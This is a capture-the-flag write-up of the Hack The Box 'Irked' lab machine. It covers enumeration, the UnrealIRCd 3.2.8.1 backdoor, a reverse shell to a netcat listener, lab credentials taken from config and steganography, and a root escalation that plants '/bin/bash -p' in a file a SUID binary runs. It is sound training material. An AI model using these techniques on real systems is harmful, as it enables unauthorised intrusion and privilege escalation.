Hack The Box : Irked
15 August, 2021
Let's begin with the nmap scan
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34297/udp6 status
| 100024 1 47073/tcp status
| 100024 1 52467/tcp6 status
|_ 100024 1 60014/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The website wasn't anything complicated
$ curl 10.10.10.117
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
I checked the common ports associated with IRC
$ nmap -p 194,6667,6660-7000 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:07 EDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Not shown: 341 closed ports
PORT STATE SERVICE
6697/tcp open ircs-u
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
$ nmap -A -p 6697 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:09 EDT
Nmap scan report for 10.10.10.117
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.38 seconds
Connecting to the port using nc
$ nc -vn 10.10.10.117 6697
(UNKNOWN) [10.10.10.117] 6697 (ircs-u) open
:irked.htb NOTICE AUTH :*** Looking up your hostname...
INFO
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irked.htb 451 INFO :You have not registered
HOST
:irked.htb 451 HOST :You have not registered
INFO
:irked.htb 451 INFO :You have not registered
VERSION
:irked.htb 005 UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irked.htb 005 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irked.htb 005 EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
ADMIN
:irked.htb 256 :Administrative info about irked.htb
:irked.htb 257 :Bob Smith
:irked.htb 258 :bob
:irked.htb 258 :widely@used.name
Looks like bob might be a username
I ran another nmap scan this time with some IRC specific scripts
$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:12 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.174] (Too many unknown connections from your IP)
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irked.htb
| version: Unreal3.2.8.1. irked.htb
| uptime: 0 days, 0:22:00
| source ident: nmap
| source host: D7DF0A82.E1443270.9F3BFBDD.IP
|_ error: Closing Link: jdnjqnzam[10.10.16.174] (Quit: jdnjqnzam)
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
Looking into the irc-unrealircd-backdoor, I found that version 3.2.8.1 of Unrealircd had a malicious backdoor https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/. I found python code for the exploit as well. Let's try it out.
$ nc -lvnp 4242
listening on [any] 4242 ...
id
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.117] 58403
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
It worked! I have a low privilege shell
User
I ran linpeas but didn't find anything significant.
Next I checked the config file /home/ircd/Unreal3.2/unrealircd.conf and found two passwords
/* Passworded allow line */
allow {
ip *@255.255.255.255;
hostname *@*.passworded.ugly.people;
class clients;
password "f00Ness";
maxperip 1;
};
oper bobsmith {
class clients;
from {
userhost bob@smithco.com;
};
password "f00";
flags
{
netadmin;
can_zline;
can_gzline;
can_gkline;
global;
};
};
I tried to enumerate IRC information using the above credentials, but nothing worked.
User
I looked around more and found a file in djmardov's documents
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
At first I started exploring text based steganography but then I realised there was an image on the homepage irked.jpg
I learnt about a tool called steghide
$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt"
I had used the password found in .backup
$ cat pass.txt
Kab6h+m+bbp2J:HG
Using this as the password I switched to djmardov and got the user flag
ircd@irked:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ whoami
whoami
djmardov
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
<flag>
Root
I ran linpeas again and this SUID file was italicised and bold in the output
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-08-15 08:41 (:0)
djmardov pts/1 2021-08-15 09:06 (10.10.16.174)
djmardov pts/2 2021-08-15 09:07 (10.10.16.174)
sh: 1: /tmp/listusers: not found
It was trying to execute some file /tmp/listusers but couldn't find it. Let me help this program and create the file...
djmardov@irked:~$ echo "/bin/bash -p" > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-08-15 08:41 (:0)
djmardov pts/1 2021-08-15 09:06 (10.10.16.174)
djmardov pts/2 2021-08-15 09:07 (10.10.16.174)
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# whoami
root
root@irked:~# cd /root
root@irked:/root# ls
pass.txt root.txt
root@irked:/root# cat root.txt
<flag>
root@irked:/root# cat pass.txt
Kab6h+m+bbp2J:HG